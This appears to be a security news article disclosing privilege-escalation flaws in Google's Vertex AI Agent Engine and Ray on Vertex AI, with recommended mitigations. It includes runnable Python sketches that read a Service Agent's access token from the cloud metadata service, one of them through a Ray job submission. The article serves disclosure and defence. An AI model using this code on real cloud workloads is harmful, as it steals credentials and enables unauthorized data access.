Monday, January 19, 2026

Cybersecurity researchers have disclosed high-severity privilege escalation vulnerabilities in Google’s Vertex AI platform that could allow low-privileged users to take control of Service Agent accounts, which are system-managed identities with elevated permissions. The issues affect Vertex AI Agent Engine and Ray on Vertex AI and stem from insecure default configurations that let users with limited permissions improperly access managed identities holding project-wide privileges.
The first issue involves Vertex AI Agent Engine, a service used to build and deploy AI agents. Researchers found that an attacker with only the permission to modify reasoning engine settings could inject malicious Python code into the workflow. The injected code executes within the service’s compute environment, allowing the attacker to retrieve credentials for the Reasoning Engine Service Agent from the cloud metadata service. This service account has access to sensitive resources such as conversation histories, model memory, storage locations, and execution logs, potentially leading to unauthorized access or data leakage within the organization.
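To make the credential-theft step concrete, the sketch below shows the kind of call injected code could make once it runs inside a Google Cloud compute environment. The metadata endpoint and the Metadata-Flavor header are the standard, documented GCE ones; everything else (the variable names and the assumption that the Reasoning Engine Service Agent is the identity attached to the workload, as the article describes) is illustrative and not a reproduction of the researchers’ exploit.

```python
# Minimal sketch: what injected Python could do from inside the Agent Engine
# compute environment, assuming the Reasoning Engine Service Agent is the
# identity attached to that environment.
import json
import urllib.request

METADATA_BASE = "http://metadata.google.internal/computeMetadata/v1"
HEADERS = {"Metadata-Flavor": "Google"}  # required by the GCE metadata service


def _metadata(path: str) -> bytes:
    """Read one path from the instance metadata service."""
    req = urllib.request.Request(f"{METADATA_BASE}{path}", headers=HEADERS)
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read()


# Identity attached to the workload (here, the Service Agent).
email = _metadata("/instance/service-accounts/default/email").decode()

# Short-lived OAuth2 access token for that identity; with it, an attacker can
# call Google Cloud APIs as the Service Agent until the token expires.
token = json.loads(_metadata("/instance/service-accounts/default/token"))

print(email, token["access_token"][:12] + "...", token["expires_in"])
```

These two metadata requests work from any Google Cloud compute workload, which is why the monitoring recommendation at the end of the article applies to metadata-service access generally, not just to Vertex AI.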
The second vulnerability was identified in Ray on Vertex AI, where users with read-only permissions could still reach core control components of the compute environment through tools exposed in the GCP Console, effectively gaining elevated control. From there, an attacker could extract access tokens for the Custom Code Service Agent from the metadata service. Although these tokens carry some restrictions, they still grant broad control over critical resources, including Cloud Storage, BigQuery, and Pub/Sub.
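The Ray side of the issue follows the same pattern: anyone who can reach a cluster’s job-submission interface can run arbitrary code on its nodes. The sketch below uses Ray’s public JobSubmissionClient API to illustrate that step under stated assumptions; the dashboard address is a placeholder, and how a read-only user reaches the dashboard of a Ray on Vertex AI cluster is described by the researchers, not reproduced here.

```python
# Minimal sketch of the Ray job-submission step, assuming the attacker has
# already reached the cluster's dashboard endpoint (address is a placeholder).
from ray.job_submission import JobSubmissionClient

DASHBOARD = "http://127.0.0.1:8265"  # placeholder; a real cluster would
                                     # expose its own dashboard address

client = JobSubmissionClient(DASHBOARD)

# The submitted entrypoint runs on the cluster's nodes, so it executes under
# the Custom Code Service Agent identity and can query the metadata service
# exactly as in the previous sketch.
job_id = client.submit_job(
    entrypoint=(
        "python -c \"import urllib.request as u;"
        " r = u.Request('http://metadata.google.internal/computeMetadata/v1"
        "/instance/service-accounts/default/token',"
        " headers={'Metadata-Flavor': 'Google'});"
        " print(u.urlopen(r).read().decode())\""
    ),
)
print("submitted:", job_id, client.get_job_status(job_id))
```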
Researchers recommend that organizations using Vertex AI mitigate these risks immediately by restricting Service Agent permissions with custom IAM roles, disabling unnecessary access to system control tools, reviewing code before deployment, and monitoring access to the metadata service.
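As a rough illustration of the first recommendation, the sketch below creates a custom IAM role through the IAM API’s projects.roles.create method, which can then be granted in place of a broad predefined role. The role ID and the permission list are hypothetical placeholders, not a vetted least-privilege set for Vertex AI Service Agents; the actual list should be derived from what the workload really calls (for example, from audit logs).

```python
# Sketch of the "custom IAM role" recommendation: create a narrowed role to
# grant instead of a broad predefined one. Role ID and permissions below are
# illustrative placeholders only.
import google.auth
from googleapiclient import discovery

credentials, project_id = google.auth.default()
iam = discovery.build("iam", "v1", credentials=credentials)

role = (
    iam.projects()
    .roles()
    .create(
        parent=f"projects/{project_id}",
        body={
            "roleId": "vertexAgentMinimal",  # hypothetical role name
            "role": {
                "title": "Vertex AI agent runtime (minimal)",
                "description": "Narrowed permissions for agent workloads.",
                # Illustrative subset; replace with the permissions the
                # workload is actually observed to use.
                "includedPermissions": [
                    "aiplatform.endpoints.predict",
                    "storage.objects.get",
                ],
                "stage": "GA",
            },
        },
    )
    .execute()
)
print("created", role["name"])
```

A narrowed role like this limits what a stolen Service Agent token can do, while the other recommendations (restricting console access to cluster tooling, pre-deployment code review, and alerting on metadata-service reads) reduce the chance the token is stolen in the first place.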
